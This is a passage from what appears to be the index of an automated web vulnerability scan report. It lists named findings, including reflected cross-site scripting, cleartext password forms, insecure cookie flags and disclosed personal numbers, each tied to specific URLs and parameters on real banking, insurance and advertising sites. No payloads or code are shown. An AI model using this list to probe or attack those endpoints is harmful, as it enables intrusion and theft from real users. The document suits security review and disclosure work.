1.4. https://secureapps.regions.com/oao/app01.aspx [ctl00%24ContentPlaceHolder1%24txtPin parameter]
1.5. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html [REST URL parameter 3]
1.6. http://www.paperg.com/flyerboard/app.com/1992/0.html [REST URL parameter 3]
1.9. http://www.paperg.com/flyerboard/conifer-park/1552/45966.html [REST URL parameter 3]
1.10. http://www.paperg.com/flyerboard/conifer-park/1753/45966.html [REST URL parameter 3]
1.11. http://www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html [REST URL parameter 3]
1.12. http://www.paperg.com/flyerboard/helderberg-mountain/1552/43055.html [REST URL parameter 3]
1.13. http://www.paperg.com/flyerboard/mount--loretto/1753/45967.html [REST URL parameter 3]
1.14. http://www.paperg.com/flyerboard/mount-loretto/1552/45967.html [REST URL parameter 3]
1.15. http://www.paperg.com/flyerboard/northwoods-health/1552/45935.html [REST URL parameter 3]
1.16. http://www.paperg.com/flyerboard/northwoods-health/1753/45935.html [REST URL parameter 3]
1.17. http://www.paperg.com/flyerboard/nyprig/1552/45945.html [REST URL parameter 3]
1.18. http://www.paperg.com/flyerboard/nyprig/1753/45945.html [REST URL parameter 3]
1.19. http://www.paperg.com/flyerboard/old-songs-festival/1552/45413.html [REST URL parameter 3]
1.20. http://www.paperg.com/flyerboard/olsens/1552/42482.html [REST URL parameter 3]
1.21. http://www.paperg.com/flyerboard/pathways/1552/43051.html [REST URL parameter 3]
1.22. http://www.paperg.com/flyerboard/pathways/1753/43051.html [REST URL parameter 3]
1.25. http://www.paperg.com/flyerboard/seton-health/1552/45970.html [REST URL parameter 3]
1.26. http://www.paperg.com/flyerboard/seton-health/1753/45970.html [REST URL parameter 3]
1.28. http://www.paperg.com/jsfb/embed.php [bid parameter]
1.29. http://www.regions.com/about_regions/company_info.rf [REST URL parameter 1]
1.30. http://www.regions.com/about_regions/email_fraud.rf [REST URL parameter 1]
1.31. http://www.regions.com/about_regions/privacy_security.rf [REST URL parameter 1]
1.32. http://www.regions.com/about_regions/protecting_self_online.rf [REST URL parameter 1]
1.33. http://www.regions.com/about_regions/report_fraud.rf [REST URL parameter 1]
1.34. http://www.regions.com/personal_banking/email_starting_net.rf [REST URL parameter 1]
1.35. http://www.regions.com/personal_banking/get_started_autoloan.rf [REST URL parameter 1]
1.36. http://www.regions.com/personal_banking/get_started_cds.rf [REST URL parameter 1]
1.37. http://www.regions.com/personal_banking/get_started_heloan.rf [REST URL parameter 1]
1.38. http://www.regions.com/personal_banking/get_started_heloc.rf [REST URL parameter 1]
1.39. http://www.regions.com/personal_banking/get_started_installmentloan.rf [REST URL parameter 1]
1.41. http://www.regions.com/personal_banking/loans_credit.rf [REST URL parameter 1]
1.42. http://www.regions.com/personal_banking/online_banking_help.rf [REST URL parameter 1]
1.43. http://www.regions.com/personal_banking/online_security.rf [REST URL parameter 1]
1.44. http://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1]
2. Cross-site scripting (reflected)
2.1. http://cigna.com/favicon.ico [REST URL parameter 1]
2.2. http://cigna.com/login_registration/index.html [REST URL parameter 1]
2.3. http://cigna.com/login_registration/index.html [REST URL parameter 2]
2.4. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 1]
2.5. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 2]
2.6. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 3]
2.7. http://cigna.com/sites/toolkit/managers_disability/home.htm [REST URL parameter 4]
2.8. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 1]
2.9. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 2]
2.10. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 3]
2.11. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 4]
2.12. http://cigna.com/sites/toolkit/managers_disability/return/index.htm [REST URL parameter 5]
2.19. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 1]
2.20. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 2]
2.21. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 3]
2.22. http://cigna.com/sites/toolkit/physicians_disability/index.htm [REST URL parameter 4]
2.24. https://secureapps.regions.com/OAO/DESGetFiles.aspx [files parameter]
2.25. https://sso.corp.cigna.com/corp/sso/professional/controller [DESTINATION parameter]
2.26. https://sso.corp.cigna.com/corp/sso/professional/controller [fname parameter]
2.27. https://sso.corp.cigna.com/corp/sso/professional/controller [lname parameter]
2.28. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html [boards%5B%5D parameter]
2.29. http://www.paperg.com/jsfb/embed.php [bid parameter]
2.30. http://www.paperg.com/jsfb/embed.php [bid parameter]
2.31. http://www.paperg.com/jsfb/embed.php [bid parameter]
2.32. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]
2.33. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]
3.1. http://ajax.googleapis.com/crossdomain.xml
3.2. http://statse.webtrendslive.com/crossdomain.xml
3.3. https://www.paperg.com/crossdomain.xml
3.4. http://www.placelocal.com/crossdomain.xml
3.5. http://ads.bridgetrack.com/crossdomain.xml
3.6. http://feeds.bbci.co.uk/crossdomain.xml
3.7. http://newsrss.bbc.co.uk/crossdomain.xml
3.8. http://www.paperg.com/crossdomain.xml
3.9. http://www.regions.com/crossdomain.xml
3.10. https://www.regions.com/crossdomain.xml
3.11. http://xsinternational.app6.hubspot.com/crossdomain.xml
4. Cleartext submission of password
4.3. http://www.paperg.com/company.php
4.4. http://www.paperg.com/contact.php
4.5. http://www.paperg.com/join.php
4.6. http://www.paperg.com/press.php
4.7. http://www.paperg.com/publishers/flyerboard.php
4.8. http://www.paperg.com/publishers/placelocal.php
4.9. http://www.paperg.com/support.php
5. SSL cookie without secure flag set
5.1. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotId.do
5.2. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotPassword.do
5.3. https://cignaforhcp.cigna.com/wps/portal
5.4. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp
5.5. https://my.cigna.com/web/public/forgotid
5.6. https://my.cigna.com/web/public/forgotpassword
5.7. https://securebank.regions.com/ForgottenPassword.aspx
5.8. https://securebank.regions.com/login.aspx
5.9. https://sso.corp.cigna.com/corp/sso/professional/controller
5.10. https://www.paperg.com/forgot.php
5.11. https://www.planservices.com/regions/
5.12. https://www.regions.com/
5.13. https://www.regions.com/personal_banking.rf
5.14. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry
5.16. https://cignaforhcp.cigna.com/portal/images/arrowonly_gold.gif
5.17. https://my.cigna.com/mycignatheme/js/min/jsTop.js
5.18. https://my.cigna.com/mycignatheme/js/min/jsTop.js
5.19. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png
5.20. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png
5.21. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png
5.22. https://my.cigna.com/web/public/guest
5.23. https://my.cigna.com/web/public/guest
5.24. https://secure.regionsmortgage.com/favicon.ico
5.25. https://secureapps.regions.com/
5.26. https://secureapps.regions.com/OAO/DESGetFiles.aspx
5.27. https://secureapps.regions.com/favicon.ico
5.28. https://secureapps.regions.com/oao/DES/Appearance/Validation/Validation.css
5.29. https://secureapps.regions.com/oao/ErrorPage.aspx
5.30. https://secureapps.regions.com/oao/FormHandler.js
5.31. https://secureapps.regions.com/oao/Images/confirmation.gif
5.32. https://secureapps.regions.com/oao/Images/funding.gif
5.33. https://secureapps.regions.com/oao/Images/gettingstarted.gif
5.34. https://secureapps.regions.com/oao/Images/helpIcon.gif
5.35. https://secureapps.regions.com/oao/Images/loading7.gif
5.36. https://secureapps.regions.com/oao/Images/yourinformation.gif
5.37. https://secureapps.regions.com/oao/Scripts/jquery.js
5.38. https://secureapps.regions.com/oao/Scripts/thickbox.js
5.39. https://secureapps.regions.com/oao/app01.aspx
5.40. https://secureapps.regions.com/oao/app02.aspx
5.41. https://secureapps.regions.com/oao/images/arrowOrange.gif
5.42. https://secureapps.regions.com/oao/images/bgDot.gif
5.43. https://secureapps.regions.com/oao/images/continue.gif
5.44. https://secureapps.regions.com/oao/images/ehl_logo.gif
5.45. https://secureapps.regions.com/oao/images/error.gif
5.46. https://secureapps.regions.com/oao/images/homepage.gif
5.47. https://secureapps.regions.com/oao/images/icon_secure.gif
5.48. https://secureapps.regions.com/oao/images/loadingAnimation.gif
5.49. https://secureapps.regions.com/oao/scripts/wtbase.js
5.50. https://secureapps.regions.com/oao/styles/main.css
5.51. https://secureapps.regions.com/oao/styles/thickbox.css
5.52. https://securebank.regions.com/SystemUnavailable.aspx
5.53. https://securebank.regions.com/VAM/2_0_2/VAM.js
5.54. https://securebank.regions.com/VAM/2_0_2/VAML2.js
5.55. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js
5.56. https://securebank.regions.com/favicon.ico
5.57. https://securebank.regions.com/images/btnContinue.gif
5.58. https://securebank.regions.com/images/equalhousing.gif
5.59. https://securebank.regions.com/images/green/rf_logo.gif
5.60. https://securebank.regions.com/images/red_arrow.gif
5.61. https://securebank.regions.com/images/spacer.gif
5.62. https://securebank.regions.com/script/regions.js
5.63. https://securebank.regions.com/styles/styles.AmSouth.css
5.64. https://securebank.regions.com/styles/stylesprint.css
5.65. https://sso.corp.cigna.com/
5.66. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif
5.67. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif
5.68. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg
5.69. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif
5.70. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif
5.71. https://sso.corp.cigna.com/corp/sso/images/pshim.gif
5.72. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif
5.73. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif
5.74. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css
5.75. https://sso.corp.cigna.com/favicon.ico
5.76. https://www.regions.com/App_Themes/2010/Ems.css
5.77. https://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif
5.78. https://www.regions.com/App_Themes/2010/img/staticFlyouts.png
5.79. https://www.regions.com/App_Themes/2010/img/staticImages.gif
5.80. https://www.regions.com/Img/sm_558800_oo.gif
5.81. https://www.regions.com/JS/cmbd-jquery.min.js
5.82. https://www.regions.com/JS/loadMedia.min.js
5.83. https://www.regions.com/favicon.ico
5.84. https://www.regions.com/js/_bt.js
5.85. https://www.regions.com/js/wtbase.js
5.86. https://www.regions.com/virtualMedia/img2612.jpg
5.87. https://www.regions.com/virtualMedia/img3090.jpg
5.88. https://www.regions.com/virtualMedia/img3094.jpg
5.89. https://www.regions.com/virtualMedia/img3107.jpg
5.90. https://www.regions.com/virtualMedia/img3108.jpg
5.91. https://www.regions.com/virtualMedia/img3132.jpg
5.92. https://www.regions.com/virtualMedia/img506.gif
6.1. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
6.2. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo
6.3. http://mt1.googleapis.com/mapslt/ft
7. Cookie scoped to parent domain
7.1. http://www.placelocal.com/forgot_password.php
7.2. http://cf.addthis.com/red/p.json
7.3. http://id.google.com/verify/EAAAALnVVncDUFzfZZPpW0uBcco.gif
7.4. http://id.google.com/verify/EAAAAMEFFrXigusXUqdbUQOi-mU.gif
7.5. https://my.cigna.com/web/public/forgotid
7.6. https://my.cigna.com/web/public/forgotpassword
7.7. https://my.cigna.com/web/public/guest
7.8. https://secure.regionsmortgage.com/favicon.ico
7.9. https://sso.corp.cigna.com/
7.10. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif
7.11. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif
7.12. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg
7.13. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif
7.14. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif
7.15. https://sso.corp.cigna.com/corp/sso/images/pshim.gif
7.16. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif
7.17. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif
7.18. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css
7.19. https://sso.corp.cigna.com/corp/sso/professional/controller
7.20. https://sso.corp.cigna.com/favicon.ico
7.21. http://va.px.invitemedia.com/pixel
8. Cookie without HttpOnly flag set
8.1. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotId.do
8.2. https://cignaforhcp.cigna.com/corp/sso/ci/selfsvc/forgotPassword.do
8.3. https://cignaforhcp.cigna.com/wps/portal
8.4. https://my.cigna.com/mycignatheme/themes/html/Enhanced/tealeaf/TealeafTarget.jsp
8.5. https://my.cigna.com/web/public/forgotid
8.6. https://my.cigna.com/web/public/forgotpassword
8.7. https://securebank.regions.com/ForgottenPassword.aspx
8.8. https://securebank.regions.com/login.aspx
8.9. https://sso.corp.cigna.com/corp/sso/professional/controller
8.10. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
8.11. https://www.paperg.com/forgot.php
8.12. http://www.placelocal.com/forgot_password.php
8.13. https://www.planservices.com/regions/
8.14. https://wwwa.applyonlinenow.com/USCCapp/Ctl/entry
8.15. http://ads.bridgetrack.com/site/rtgt.asp
8.16. http://cf.addthis.com/red/p.json
8.18. https://cignaforhcp.cigna.com/portal/images/arrowonly_gold.gif
8.19. https://my.cigna.com/mycignatheme/js/min/jsTop.js
8.20. https://my.cigna.com/mycignatheme/js/min/jsTop.js
8.21. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png
8.22. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png
8.23. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png
8.24. https://my.cigna.com/web/public/guest
8.25. https://my.cigna.com/web/public/guest
8.27. https://secure.regionsmortgage.com/favicon.ico
8.28. https://secureapps.regions.com/
8.29. https://secureapps.regions.com/OAO/DESGetFiles.aspx
8.30. https://secureapps.regions.com/favicon.ico
8.31. https://secureapps.regions.com/oao/DES/Appearance/Validation/Validation.css
8.32. https://secureapps.regions.com/oao/ErrorPage.aspx
8.33. https://secureapps.regions.com/oao/FormHandler.js
8.34. https://secureapps.regions.com/oao/Images/confirmation.gif
8.35. https://secureapps.regions.com/oao/Images/funding.gif
8.36. https://secureapps.regions.com/oao/Images/gettingstarted.gif
8.37. https://secureapps.regions.com/oao/Images/helpIcon.gif
8.38. https://secureapps.regions.com/oao/Images/loading7.gif
8.39. https://secureapps.regions.com/oao/Images/yourinformation.gif
8.40. https://secureapps.regions.com/oao/Scripts/jquery.js
8.41. https://secureapps.regions.com/oao/Scripts/thickbox.js
8.42. https://secureapps.regions.com/oao/app01.aspx
8.43. https://secureapps.regions.com/oao/app02.aspx
8.44. https://secureapps.regions.com/oao/images/arrowOrange.gif
8.45. https://secureapps.regions.com/oao/images/bgDot.gif
8.46. https://secureapps.regions.com/oao/images/continue.gif
8.47. https://secureapps.regions.com/oao/images/ehl_logo.gif
8.48. https://secureapps.regions.com/oao/images/error.gif
8.49. https://secureapps.regions.com/oao/images/homepage.gif
8.50. https://secureapps.regions.com/oao/images/icon_secure.gif
8.51. https://secureapps.regions.com/oao/images/loadingAnimation.gif
8.52. https://secureapps.regions.com/oao/scripts/wtbase.js
8.53. https://secureapps.regions.com/oao/styles/main.css
8.54. https://secureapps.regions.com/oao/styles/thickbox.css
8.55. https://securebank.regions.com/SystemUnavailable.aspx
8.56. https://securebank.regions.com/VAM/2_0_2/VAM.js
8.57. https://securebank.regions.com/VAM/2_0_2/VAML2.js
8.58. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js
8.59. https://securebank.regions.com/favicon.ico
8.60. https://securebank.regions.com/images/btnContinue.gif
8.61. https://securebank.regions.com/images/equalhousing.gif
8.62. https://securebank.regions.com/images/green/rf_logo.gif
8.63. https://securebank.regions.com/images/red_arrow.gif
8.64. https://securebank.regions.com/images/spacer.gif
8.65. https://securebank.regions.com/script/regions.js
8.66. https://securebank.regions.com/styles/styles.AmSouth.css
8.67. https://securebank.regions.com/styles/stylesprint.css
8.68. https://sso.corp.cigna.com/
8.69. https://sso.corp.cigna.com/corp/sso/images/CIGNAforpros_logo1.gif
8.70. https://sso.corp.cigna.com/corp/sso/images/arrow_orange.gif
8.71. https://sso.corp.cigna.com/corp/sso/images/cigna_logo.jpg
8.72. https://sso.corp.cigna.com/corp/sso/images/header_forgot_ID.gif
8.73. https://sso.corp.cigna.com/corp/sso/images/header_forgot_password.gif
8.74. https://sso.corp.cigna.com/corp/sso/images/pshim.gif
8.75. https://sso.corp.cigna.com/corp/sso/images/truesecure.gif
8.76. https://sso.corp.cigna.com/corp/sso/images/yahoo_logo.gif
8.77. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css
8.78. https://sso.corp.cigna.com/favicon.ico
8.79. http://statse.webtrendslive.com/dcs4b71fc10000gs8u88h5t1k_6n2i/dcs.gif
8.80. http://statse.webtrendslive.com/dcspiqc94wz5bdfiwi4batkw3_5h6k/dcs.gif
8.81. http://va.px.invitemedia.com/pixel
8.82. http://www.bankofamerica.com/global/mvc_objects/stylesheet/hs2_mvc_content_style_default2.css
8.83. http://www.mycigna.com/rte/public/gatekeeper
8.84. http://www.placelocal.com/
8.86. http://www.regions.com/App_Themes/2010/Ems.css
8.87. http://www.regions.com/App_Themes/2010/img/arrowGray_Small.gif
8.88. http://www.regions.com/App_Themes/2010/img/hdrItemSep.gif
8.89. http://www.regions.com/App_Themes/2010/img/headerfullBG.gif
8.90. http://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif
8.91. http://www.regions.com/App_Themes/2010/img/staticFlyouts.png
8.92. http://www.regions.com/App_Themes/2010/img/staticImages.gif
8.93. http://www.regions.com/App_Themes/IE6/Ems.css
8.94. http://www.regions.com/App_Themes/IE6/img/hdrItemSep.gif
8.95. http://www.regions.com/App_Themes/IE6/img/staticBackgrounds.gif
8.96. http://www.regions.com/App_Themes/IE6/img/staticFlyouts.png
8.97. http://www.regions.com/App_Themes/IE6/img/staticImages.gif
8.98. http://www.regions.com/App_Themes/Promotion/Ems.css
8.99. http://www.regions.com/App_Themes/Promotion/img/arrowGray_Small.gif
8.100. http://www.regions.com/App_Themes/Promotion/img/staticBackgrounds.gif
8.101. http://www.regions.com/App_Themes/Promotion/img/staticImages.gif
8.102. http://www.regions.com/Img/sm_558800_oo.gif
8.103. http://www.regions.com/JS/cmbd-jquery.min.js
8.104. http://www.regions.com/JS/loadMedia.js
8.105. http://www.regions.com/JS/loadMedia.min.js
8.106. http://www.regions.com/about_regions/IR_investorrelations.html
8.107. http://www.regions.com/about_regions/company_info.rf
8.108. http://www.regions.com/about_regions/email_fraud.rf
8.109. http://www.regions.com/about_regions/privacy_security.rf
8.110. http://www.regions.com/about_regions/protecting_self_online.rf
8.111. http://www.regions.com/about_regions/report_fraud.rf
8.112. http://www.regions.com/favicon.ico
8.113. http://www.regions.com/img/arrowGray_Small.gif
8.114. http://www.regions.com/js/_bt.js
8.115. http://www.regions.com/js/wtbase.js
8.116. http://www.regions.com/personal_banking/email_starting_net.rf
8.117. http://www.regions.com/personal_banking/get_started_autoloan.rf
8.118. http://www.regions.com/personal_banking/get_started_cds.rf
8.119. http://www.regions.com/personal_banking/get_started_heloan.rf
8.120. http://www.regions.com/personal_banking/get_started_heloc.rf
8.121. http://www.regions.com/personal_banking/get_started_installmentloan.rf
8.122. http://www.regions.com/personal_banking/get_started_lifegreen_checking.rf
8.123. http://www.regions.com/personal_banking/loans_credit.rf
8.124. http://www.regions.com/personal_banking/online_banking_help.rf
8.125. http://www.regions.com/personal_banking/online_security.rf
8.126. http://www.regions.com/personal_banking/open_account.rf
8.127. http://www.regions.com/virtualMedia/img1213.gif
8.128. http://www.regions.com/virtualMedia/img2020.gif
8.129. http://www.regions.com/virtualMedia/img2027.gif
8.130. http://www.regions.com/virtualMedia/img2028.gif
8.131. http://www.regions.com/virtualMedia/img243.gif
8.132. http://www.regions.com/virtualMedia/img422.gif
8.133. http://www.regions.com/virtualMedia/img506.gif
8.134. http://www.regions.com/virtualMedia/img537.gif
8.135. http://www.regions.com/virtualMedia/img563.gif
8.136. http://www.regions.com/virtualMedia/img588.gif
8.137. http://www.regions.com/virtualMedia/img828.gif
8.138. http://www.regions.com/virtualmedia/img240.gif
8.139. http://www.regions.com/virtualmedia/img265.gif
8.140. http://www.regions.com/virtualmedia/img286.jpg
8.141. http://www.regions.com/wrapperHeader.aspx
8.142. https://www.regions.com/
8.143. https://www.regions.com/App_Themes/2010/Ems.css
8.144. https://www.regions.com/App_Themes/2010/img/staticBackgrounds.gif
8.145. https://www.regions.com/App_Themes/2010/img/staticFlyouts.png
8.146. https://www.regions.com/App_Themes/2010/img/staticImages.gif
8.147. https://www.regions.com/Img/sm_558800_oo.gif
8.148. https://www.regions.com/JS/cmbd-jquery.min.js
8.149. https://www.regions.com/JS/loadMedia.min.js
8.150. https://www.regions.com/favicon.ico
8.151. https://www.regions.com/js/_bt.js
8.152. https://www.regions.com/js/wtbase.js
8.153. https://www.regions.com/personal_banking.rf
8.154. https://www.regions.com/virtualMedia/img2612.jpg
8.155. https://www.regions.com/virtualMedia/img3090.jpg
8.156. https://www.regions.com/virtualMedia/img3094.jpg
8.157. https://www.regions.com/virtualMedia/img3107.jpg
8.158. https://www.regions.com/virtualMedia/img3108.jpg
8.159. https://www.regions.com/virtualMedia/img3132.jpg
8.160. https://www.regions.com/virtualMedia/img506.gif
8.161. http://www.regionsmortgage.com/BeforeYouBegin/ApplyNow
8.163. http://xsinternational.app6.hubspot.com/salog.js.aspx
9. Password field with autocomplete enabled
9.2. https://cignaforhcp.cigna.com/wps/portal
9.3. https://www.frontrowusa.com/Cart/Address
9.4. https://www.frontrowusa.com/members/login
9.6. http://www.paperg.com/company.php
9.7. http://www.paperg.com/contact.php
9.8. http://www.paperg.com/join.php
9.9. http://www.paperg.com/press.php
9.10. http://www.paperg.com/publishers/flyerboard.php
9.11. http://www.paperg.com/publishers/placelocal.php
9.12. http://www.paperg.com/support.php
9.14. https://www.paperg.com/post.php
9.15. https://www.paperg.com/post.php
9.16. http://www.placelocal.com/
9.17. http://www.placelocal.com/forgot_password.php
9.18. https://www.planservices.com/regions/
10. Referer-dependent response
11.2. http://www.frontrowusa.com/
11.3. http://www.frontrowusa.com/Concerts/U2_Tickets.htm
11.5. http://www.frontrowusa.com/Sell-Tickets
11.6. http://www.frontrowusa.com/Sports_Tickets
11.7. https://www.frontrowusa.com/Cart
11.8. https://www.frontrowusa.com/Cart/Address
11.9. https://www.frontrowusa.com/members/login
11.10. http://www.mycigna.com/
12. Cross-domain Referer leakage
12.1. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/ifr
12.2. http://phx.corporate-ir.net/phoenix.zhtml
12.3. https://securebank.regions.com/SystemUnavailable.aspx
12.4. http://www.google.com/search
12.5. http://www.google.com/search
12.6. http://www.mycigna.com/sslreq.html
12.7. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
12.8. http://www.regions.com/wrapperHeader.aspx
12.9. http://www.regionsmortgage.com/Error/Error
12.10. http://www.xsnet.com/Portals/64787/footerStuff.html
13. Cross-domain script include
13.1. https://secureapps.regions.com/oao/ErrorPage.aspx
13.2. https://secureapps.regions.com/oao/app01.aspx
13.3. https://secureapps.regions.com/oao/app02.aspx
13.4. http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html
13.5. http://www.frontrowusa.com/
13.6. http://www.frontrowusa.com/Concerts/U2_Tickets.htm
13.8. http://www.frontrowusa.com/Sell-Tickets
13.9. http://www.frontrowusa.com/Sports_Tickets
13.10. https://www.frontrowusa.com/Cart
13.11. https://www.frontrowusa.com/Cart/Address
13.12. https://www.frontrowusa.com/members/login
13.14. http://www.paperg.com/company.php
13.15. http://www.paperg.com/contact.php
13.16. http://www.paperg.com/flyerboard/albany-times-union/1552/0.html
13.17. http://www.paperg.com/flyerboard/app.com/1992/0.html
13.18. http://www.paperg.com/flyerboard/code-enforcement-officer/3017/30085.html
13.19. http://www.paperg.com/flyerboard/code-enforcement-officer/3023/30085.html
13.20. http://www.paperg.com/flyerboard/conifer-park/1552/45966.html
13.21. http://www.paperg.com/flyerboard/conifer-park/1753/45966.html
13.22. http://www.paperg.com/flyerboard/electrical-sub-code/3474/44819.html
13.23. http://www.paperg.com/flyerboard/helderberg-mountain/1552/43055.html
13.24. http://www.paperg.com/flyerboard/mount--loretto/1753/45967.html
13.25. http://www.paperg.com/flyerboard/mount-loretto/1552/45967.html
13.26. http://www.paperg.com/flyerboard/northwoods-health/1552/45935.html
13.27. http://www.paperg.com/flyerboard/northwoods-health/1753/45935.html
13.28. http://www.paperg.com/flyerboard/nyprig/1552/45945.html
13.29. http://www.paperg.com/flyerboard/nyprig/1753/45945.html
13.30. http://www.paperg.com/flyerboard/old-songs-festival/1552/45413.html
13.31. http://www.paperg.com/flyerboard/olsens/1552/42482.html
13.32. http://www.paperg.com/flyerboard/pathways/1552/43051.html
13.33. http://www.paperg.com/flyerboard/pathways/1753/43051.html
13.34. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1552/45964.html
13.35. http://www.paperg.com/flyerboard/residence-inn-by-marriott/1753/45964.html
13.36. http://www.paperg.com/flyerboard/seton-health/1552/45970.html
13.37. http://www.paperg.com/flyerboard/seton-health/1753/45970.html
13.38. http://www.paperg.com/flyerboard/your-business-or-event-could-be-here/1552/222.html
13.39. http://www.paperg.com/join.php
13.40. http://www.paperg.com/press.php
13.41. http://www.paperg.com/publishers/flyerboard.php
13.42. http://www.paperg.com/publishers/placelocal.php
13.43. http://www.paperg.com/support.php
13.44. https://www.paperg.com/
13.45. https://www.paperg.com/forgot.php
13.46. https://www.paperg.com/post.php
13.47. http://www.placelocal.com/
13.49. http://www.xsnet.com/datacenter-relocation-services/
13.50. http://www.xsnet.com/it-asset-disposition-services/
14.1. https://my.cigna.com/mycignatheme/js/min/js.js
14.2. https://my.cigna.com/mycignatheme/js/min/jsTop.js
14.3. https://securebank.regions.com/ForgottenPassword.aspx
14.4. https://securebank.regions.com/SystemUnavailable.aspx
14.5. https://securebank.regions.com/VAM/2_0_2/VAM.js
14.6. https://securebank.regions.com/VAM/2_0_2/VAML2.js
14.7. https://securebank.regions.com/VAM/2_0_2/VAM_DTTB.js
14.8. https://securebank.regions.com/favicon.ico
14.9. https://securebank.regions.com/images/btnContinue.gif
14.10. https://securebank.regions.com/images/equalhousing.gif
14.11. https://securebank.regions.com/images/green/rf_logo.gif
14.12. https://securebank.regions.com/images/red_arrow.gif
14.13. https://securebank.regions.com/images/spacer.gif
14.14. https://securebank.regions.com/login.aspx
14.15. https://securebank.regions.com/script/regions.js
14.16. https://securebank.regions.com/styles/styles.AmSouth.css
14.17. https://securebank.regions.com/styles/stylesprint.css
14.18. http://www.google.com/uds/solutions/slideshow/gfslideshow.js
14.19. https://www.paperg.com/post.php
14.20. http://www.placelocal.com/css/ui.all.css
14.21. http://www.placelocal.com/js/includes/jquery-ui-personalized.js
14.22. http://www.regions.com/about_regions/email_fraud.rf
14.23. http://www.regions.com/about_regions/report_fraud.rf
14.24. http://www.regions.com/personal_banking/online_security.rf
15. Private IP addresses disclosed
16. Social security numbers disclosed
16.1. http://assets.olark.com/a/assets/v0/site/4116-752-10-3079.js
16.2. http://www.placelocal.com/
16.3. http://www.placelocal.com/forgot_password.php
17. Credit card numbers disclosed
18.1. http://ajax.googleapis.com/ajax/services/feed/load
18.3. http://feeds.bbci.co.uk/news/rss.xml
18.4. https://my.cigna.com/web/public/guest
18.5. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
18.6. http://themes.googleusercontent.com/image
18.7. http://www.blogger.com/dyn-css/authorization.css
18.8. http://www.cloudscan.me/p/enterprise-exploit-coverage-by-hoyt-llc.html
18.9. http://www.frontrowusa.com/
18.10. http://www.google-analytics.com/__utm.gif
18.11. http://www.placelocal.com/forgot_password.php
18.12. http://www.regions.com/
18.13. https://www.regions.com/personal_banking.rf
19.1. https://cignaforhcp.cigna.com/
19.3. https://cignaforhcp.cigna.com/corp/sso/styles/portal_styles.css
19.6. https://my.cigna.com/mycignatheme/themes/html/Enhanced/css/images/divider_horizontal.png
19.7. https://my.cigna.com/web/public/guest
19.8. https://sso.corp.cigna.com/corp/sso/includes/portal_styles.css
19.9. https://sso.corp.cigna.com/corp/sso/professional/controller
19.10. https://www.paperg.com/privacy.htm
19.11. https://wwwa.applyonlinenow.com/USCCapp/static/error.html
20. Multiple content types specified
21. HTML does not specify charset
21.1. http://cigna.com/sites/toolkit/managers_disability/home.htm
21.2. http://cigna.com/sites/toolkit/managers_disability/return/index.htm
21.3. http://cigna.com/sites/toolkit/physicians_disability/home/forms/index.htm
21.4. http://cigna.com/sites/toolkit/physicians_disability/index.htm
21.6. https://secureapps.regions.com/
21.7. https://sso.corp.cigna.com/
21.8. http://www.paperg.com/jsfb/embed.php
21.9. http://www.paperg.com/sitemap.php
21.10. http://www.paperg.com/sitemap/albany-times-union/1552.html
21.11. http://www.paperg.com/sitemap/app.com/1992.html
21.12. http://www.paperg.com/sitemap/arizona-daily-star/2955.html
